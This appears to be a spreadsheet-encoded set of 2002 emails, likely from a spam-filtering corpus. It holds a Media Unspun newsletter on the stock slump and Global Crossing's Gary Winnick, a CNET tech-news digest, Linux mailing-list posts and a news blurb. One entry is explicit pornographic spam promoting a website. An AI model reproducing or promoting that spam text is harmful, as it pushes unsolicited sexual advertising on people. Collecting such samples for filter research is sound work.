 Market's Worst Quarter Since '87 Crash Limps to a Close&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/business/01STOX.html"&gt;http://www.nytimes.com/2002/10/01/business/01STOX.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 For Dow and S&amp;P, Worst Quarter Since '87 &lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24961-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 3rd quarter worst for stocks since '87 (Denver Post)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1q3i"&gt;http://tinyurl.com/1q3i&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Market's tumble persists, capping worst three months in 15 years&lt;br&gt;
 &lt;A HREF="http://www.siliconvalley.com/mld/siliconvalley/4186771.htm"&gt;http://www.siliconvalley.com/mld/siliconvalley/4186771.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Stock Market Quarterly Review&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/page/0,,2_0861,00.html"&gt;http://online.wsj.com/page/0,,2_0861,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;&lt;P&gt;
 Beware! October Is A Very Bad Month For The Stock Market &lt;br&gt;
 &lt;A HREF="http://www.nypost.com/business/58389.htm"&gt;http://www.nypost.com/business/58389.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 SUSAN TOMPOR: Bad news is, the beating isn't over yet &lt;br&gt;
 &lt;A HREF="http://www.freep.com/money/business/tompor1_20021001.htm"&gt;http://www.freep.com/money/business/tompor1_20021001.htm&lt;/A&gt; &lt;br&gt;
 &lt;/P&gt;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&lt;P&gt;What's Really Going on at Microsoft? Mary Jo Foley delivers unmatched reporting and insight with MICROSOFT WATCH.  Track initiatives like .Net, Palladium, Longhorn, Trinity, Yukon; release dates, competitive moves, people. For a FREE 14-day trial subscription:&lt;br&gt;
 &lt;A HREF="https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075"&gt;https://ziffdavis.omeda.com/zm/msw/msw.cgi?intro2&amp;p=5UCXA00075&lt;/A&gt; &lt;/P&gt;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name="a97668"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Winnick: Hands-Off or Red-Handed?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Former Global Crossing chairman Gary Winnick will appear before a Congressional committee today. It won't be pretty. CNN predicted he will plead the Fifth. Most other outlets expected Winnick to testify.&lt;/P&gt;&lt;P&gt;
 Impetus for all the coverage was yesterday's release by the House Energy and Commerce Committee of memos indicating that Winnick was in the thick of the company's suspect dealmaking. A committee spokesman said, "If he tries to portray himself as an out-of-the-loop ceremonial chairman, we intend to remind him that he is under oath."&lt;/P&gt;&lt;P&gt;
 The memo that got most of the attention was one from then-CEO Leo Hindery to Winnick in June 2001. Hindery warned in colorful language that the company was heading for a fall. The Financial Times, Washington Post, and New York Times all ran a quote from the memo comparing telcos to salmon. Hindery urged Winnick to unload the company -- "without looking like we are shaking our bootie all over the world," quoted the two Timeses -- and resigned shortly thereafter.&lt;/P&gt;&lt;P&gt;
 One little detail from the memos is guaranteed to make Winnick's time under the television lights even more uncomfortable. Among the companies he used his influence with, to help close deals, was Enron. All the reports mentioned Enron, but the New York Times seemed to be alone in noting that Global Crossing never completed a deal with the fallen energy giant.&lt;/P&gt;&lt;P&gt;
 The Wall Street Journal looked beyond the obviously embarrassing details of the memos to point out that, despite such evidence, the gun might not be smoking yet. "Prosecutors would still need to prove that he knew the transactions were improper and used them mainly as a way of enriching himself by boosting the company's stock price artificially," the Journal reporters wrote. The AP noted that all of the memos were dated after Winnick's last sale of Global Crossing stock, $123 million in May
 2001.&lt;/P&gt;&lt;P&gt;
 Despite his $734 million in stock profits, Gary Winnick was not among the five telco executives being sued by New York attorney general Eliot Spitzer to return their ill-gotten gains. Is Spitzer betting, with the Journal, that Winnick might walk away clean? - Keith Dawson&lt;/P&gt;&lt;P&gt;
 Global Crossing: What Did Winnick Know?&lt;br&gt;
 &lt;A HREF="http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/"&gt;http://www.cnn.com/2002/ALLPOLITICS/09/30/time.crossing.tm/&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Winnick Was Told Of Telecom Risks&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24886-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Memo Indicates Global Crossing Chief Knew of Troubles&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/business/01GLOB.html"&gt;http://www.nytimes.com/2002/10/01/business/01GLOB.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Global Crossing's Winnick Knew About Swap Deals&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1033426396710785953,00.html"&gt;http://online.wsj.com/article/0,,SB1033426396710785953,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required)&lt;/P&gt;&lt;P&gt;
 Documents show active role by Global Crossing chairman (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/business/4187381.htm"&gt;http://www.bayarea.com/mld/mercurynews/business/4187381.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Suit Seeks IPO Profits From Five Executives&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A24921-2002Sep30.html&lt;/A&gt; &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a97669"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Fund giant Fidelity set to eliminate 1,695 jobs (Boston Globe)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1q3h"&gt;http://tinyurl.com/1q3h&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 AOL Chairman's No. 1 Ally Turns Into His Biggest Foe&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/technology/01AOL.html"&gt;http://www.nytimes.com/2002/10/01/technology/01AOL.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 More living without benefits: Health insurance given less frequently at work  &lt;br&gt;
 &lt;A HREF="http://www.freep.com/money/business/insure30_20020930.htm"&gt;http://www.freep.com/money/business/insure30_20020930.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Beware al-Qaida, Branch is on to you (Battle Creek Enquirer)&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/1prs"&gt;http://tinyurl.com/1prs&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Hewlett-Packard and EMC Sue Each Other (Reuters)&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html"&gt;http://www.nytimes.com/reuters/technology/tech-tech-hewlett-emc.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Dealing With W&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/10/01/opinion/01KRUG.html"&gt;http://www.nytimes.com/2002/10/01/opinion/01KRUG.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Broadband Disconnect&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A21649-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Judge Dismisses $800M Cell Phone-Brain Tumor Suit (AP)&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A22712-2002Sep30.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft Puts Meat Behind Security Push&lt;br&gt;
 &lt;A HREF="http://www.eweek.com/article2/0,3959,561985,00.asp"&gt;http://www.eweek.com/article2/0,3959,561985,00.asp&lt;/A&gt; &lt;/P&gt;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Marketing: Cowpoke Productions (&lt;a href="http://www.cowpokeproductions.com"&gt;cowpokeproductions.com&lt;/a&gt;).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value="http://newsletter.mediaunspun.com/index000021074.cfm"&gt;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 &lt;font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&lt;!-- 3,4:article_view --&gt;
 &lt;table width="100%" border="0" cellspacing="0" cellpadding="4" bgcolor="#FFFFFF"&gt;
 &lt;tr&gt;&lt;td
 bgcolor="#000000"&gt;
 	&lt;font face="arial" size="2" color="#FFFFFF"&gt;&lt;b&gt;
 		&lt;CENTER&gt;Advertisement&lt;/CENTER&gt;
 	&lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#FFFFFF"&gt;
 	&lt;TABLE bgcolor="#FFFFFF" border="0" cellpadding="3" cellspacing="0" width="100%"&gt;
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 				&lt;a href="http://www.poptech.org"&gt;&lt;img src="http://a298.g.akamai.net/7/298/5382/100102092338/www.imakenews.com/mediaunspun/mediaunspun_e_a000089486.JPG" BORDER="0" alt="" hspace="5" vspace="1" align="top"&gt;&lt;/a&gt;
 				&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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000021074.cfm&amp;XXDESXXissue_id=21074&amp;XXDESXXtitle=Media%20Unspun"
 			 class="a274101923387038-footer_tellafriend"&gt;
 			&lt;font size=4&gt;Tell a Friend...&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E219036,5114587XXmediaunspunXX21074XXXXindex000021074.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1033478774-12610-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Meatdemons
</t>
  </si>
  <si>
    <t xml:space="preserve">Come check out Meatdemons!!
 These young starlets think they have a future sucking cock.
 With Amazing Facials, Cum Shots, and Deep Throating action.
 they just might.
 Click here for our free 80 picture gallery!!
 http://free10.meatdemons.com/free.html
 No strings attached. I know everyones says that.
 But it is true.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Sylpheed with GNOME 2 (was Re: Ximian apt repos?)
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Lance wrote :
 &gt; Well, from the looks of things, I can import all my mail settings from
 &gt; Evolution to Sylpheed.  Has anyone successfully run Sylpheed in Gnome
 &gt; 2.0?  I noticed with 'apt-get install gnome-session' from the 'rpm
 &gt; http://apt.sunnmore.net gnome2 73' repository, Sylpheed isn't one of the
 &gt; packages selected for deletion.
 I think that's simply because Sylpheed isn't a GNOME application, but a
 "simple" gtk+ one. It needs no GNOME libs at all, so upgrading to GNOME 2
 but keeping gtk+ 1.2 will let you keep Sylpheed with no problem.
 Matthias
 PS : Expect 0.8.1 on freshrpms.net in a few minutes ;-)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</si>
  <si>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&gt;&gt;&gt;&gt;&gt; "E" == Eugen Leitl &lt;eugen@leitl.org&gt; writes:
     E&gt; Seems somebody is so awfully eager to pick up a slice of
     E&gt; research grant pie from the heimatland securitate money they
     E&gt; haven't even bothered to invent a plausible lie.
 Seems also from the news being reported that it's likely they already
 have a slice of that pie, which says something about the mindset of
 the people handing out the slices.  Ditto for the biometric airport ID
 machines.
 My personal raw guess: The people with the pie /already/ /know/ the
 people with the Ghostbusters Gear, they play golf regularly, have for
 years, and perhaps even co-own some private venture that profits win
 or lose from the grant.  9-11 seems to have made every
 security-oriented-corp shareholder's eyes light up with
 red-white-and-blue dollar signs, and like sharks to a cut swimmer or
 psychologists to a distressed town, they came swarming on the
 motherlode.
 I only guess that because the pattern seems historically so
 statistically prevalent.
 -- 
 Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications Inc
  Business Advantage through Community Software : http://www.teledyn.com
 "Computers are useless.  They can only give you answers."(Pablo Picasso)
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Oil set to be pumped from blazing ship
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8086490,1440/
 Date: Not supplied
 The cargo vessel ran aground off a World Heritage conservation site in South 
 Africa - raging fires are hampering salvage attempts
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET NEWS.COM: Cable companies cracking down on Wi-Fi
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Cable companies cracking down on Wi-Fi&lt;/title&gt;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&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;tr&gt;&lt;td align=center bgcolor="#e5e5e5"&gt;
 		&lt;img src="http://home.cnet.com/i/ne/ds/ad.gif" alt="" width="107" height="16" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;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href="http://clickthru.online.com/Click?q=4a-HcgUIPpcnTHdcorsxoLkkTKhn-yR" &gt;Live tech help NOW!&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX2F1YRa96fez6pa6cIJPR" &gt;April's tech award&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSN6JNEnCRYG8Y0gSPZxnR" &gt;1 million open jobs&lt;/a&gt;&lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1QVNIV5FkUMBXB6W5WWcR" &gt;News.com: Top CIOs&lt;/a&gt; &lt;p&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9e-tWQoQtMQJG9vEv5HSCN0U7nQUDRR"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9, 2002&lt;/font&gt;&lt;br&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;/table&gt;
 	&lt;img src="http://home.cnet.com/b.gif" alt="" width="1" height="6" border="0"&gt;&lt;br&gt;
 	&lt;font face="Arial, Helvetica" size="-1"&gt;
 	 &lt;a href="#h1" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Cable companies cracking down on Wi-Fi&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h2" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Apple's iPod comes to Linux&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h3" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Talk of Dell printer move heats up&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h4" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Microsoft eyes Visa users with Passport&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h5" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 Judge OKs suit against Kazaa parent&lt;/font&gt;&lt;/a&gt;&lt;br&gt;
 	 &lt;a href="#h6" style="text-decoration:none;"&gt;&lt;img src="http://home.cnet.com/i/ne/ds/arrow.gif" alt="" width="11" height="9" border="0"&gt;&lt;font color="#000000"&gt;
 China wakes to new destiny&lt;/font&gt;&lt;/a&gt;&lt;br&gt;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Helvetica"&gt;&amp;nbsp;&lt;b&gt;Vision Series&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;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Read News.com's exclusive interviews of 10 top CIOs, including IBM's Phil Thompson.&lt;br&gt;
 				&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1xK4xfxgqJzDxDXozLCdR" &gt;Vision Series home&lt;/a&gt;&lt;/b&gt;&lt;br&gt;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&lt;b&gt;Cable companies cracking down on Wi-Fi&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Broadband providers are cracking down on popular Wi-Fi networks, threatening to cut service to customers who set up the inexpensive wireless systems and allow others to freely tap into their Internet access.
 Time Warner Cable of New York City has given 10 customers less than a week to stop using their accounts to provide a wireless local area network available to anyone within 300 feet. The letters are just an initial volley; Time Warner expects to send additional letters, while AT&amp;T Broadband also is preparing similar letters for some of its customers.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkU3mw4fgjg0SxiPZvH6cR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Apple's iPod comes to Linux&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Windows users have recently been given access to the popular Macintosh music player, iPod, and now Linux users may soon be able to take a bite out of Apple Computer's gadget. Last week, tex9, a small software-development company in San Francisco, began beta testing an iPod plug-in for its xtunes music player software, which is itself a Linux clone of Apple's iTunes. The plug-in will, tex9 promises, allow drag-and-drop access to iPod, which holds up to 10GB of music.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFHE_SERofbQq-Kh1XhaZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Talk of Dell printer move heats up&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Dell Computer appears to be moving toward selling its own printers.
 A pair of analyst reports issued Tuesday added to a torrent of recent speculation that the Round Rock, Texas-based PC maker's next move will be into the printer market. Dell has plunged into a number of new markets over the past few years.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:30 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0skGx03lD7uUJ5QddfWmTdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Microsoft eyes Visa users with Passport&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft hopes to extend its Passport online identification system into authorizing credit card payments.
 The software giant will strike a partnership Tuesday with security-software maker Arcot Systems, which builds online payment systems for merchants and for banks that issue Visa and MasterCard credit cards. Arcot makes the systems behind Visa's own Verified by Visa program as well as a similar program in development at MasterCard.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 8, 2002, 9:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88wYrwYd1LYSS7ZMgtY8cR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Judge OKs suit against Kazaa parent&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A federal judge said Monday that record labels and film studios could expand an ongoing copyright lawsuit to include Sharman Networks, which distributes the popular Kazaa software.
 The Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA) sued three prominent file-swapping companies in October in Los Angeles federal court. The suit named Morpheus parent StreamCast Networks, Grokster and Kazaa BV, the Netherlands-based company that originally created the Kazaa software.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:55 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWHd57RCeqEsB8LE27qdRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;China wakes to new destiny&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Global slump prompts tech titans to tap the sleeping giant's manufacturing prowess and consumer market.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjXKjpwghvz6yClxb-7XsFR"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&lt;b&gt;Another big charge for AOL?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 It may again have billions of excess goodwill on its books, and a write-down won't go over well with already unhappy investors.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsyRC-D3fXl_kj2ZBSJu4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Business needs to take the blinders off&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Today's corporate apologists are too much like the Marxists who reflexively defended Communism's old poster boy -- Stalin.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sjRJtwwOobvZm5yGKIaeR"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href="http://clickthru.online.com/Click?q=72-R8PHIPUf0jrNqz0rqMtNXjoCKqyR"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href="http://clickthru.online.com/Click?q=88-ec5PQQKx6IEe4UY-rU358atSBb9R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0umM4zedRuKLvd75wKZzuR"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href="http://clickthru.online.com/Click?q=b2-M4pwQX0a3ZhfzqvjM2cmpxUCPusR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWxessB4vNWtUoF24wxeZR"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href="http://clickthru.online.com/Click?q=dc-40zzQ0Lr5OhlQXYBz6gEwTinhldR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeN3O_A0pvVdi5Z7edsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9TCgh8KiqzUbrvLkiDZR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43mNlgPjn9kgGa2oXqGdR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD0vB7ayyLxjkqVAXXbcR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNGQ8sta1cN0535V0YiR"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src="http://news.cnet.com/i/ne/bb/2002/07/0708_netscape7.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUXrvYmoxCjjvDSwizzlR" &gt;Netscape 7: How does it stack up?&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 CNET Download.com's Rex Baldazo previews Netscape 7, a new open-source version of the browser that the company hopes will chip away at Microsoft's leading position with Internet Explorer.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VDyyOjYKns2asfI8Uk4R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfSBryiQaf70SVbToBBuR"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href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGY_mw61Figi7yr9FKgsR" &gt;
 Shares in chip gear fall on new fears&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkx4VuLSydDX7NdmUVSZR" &gt;
 Dell douses Lexmark speculation&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-FWAk_zSROUJEymxquR" &gt;
 Microsoft tests dressed up Web software&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_nEl9djbjsMVKpv3DxsR" &gt;
 Stocks edge lower after Bush speech&lt;/a&gt;
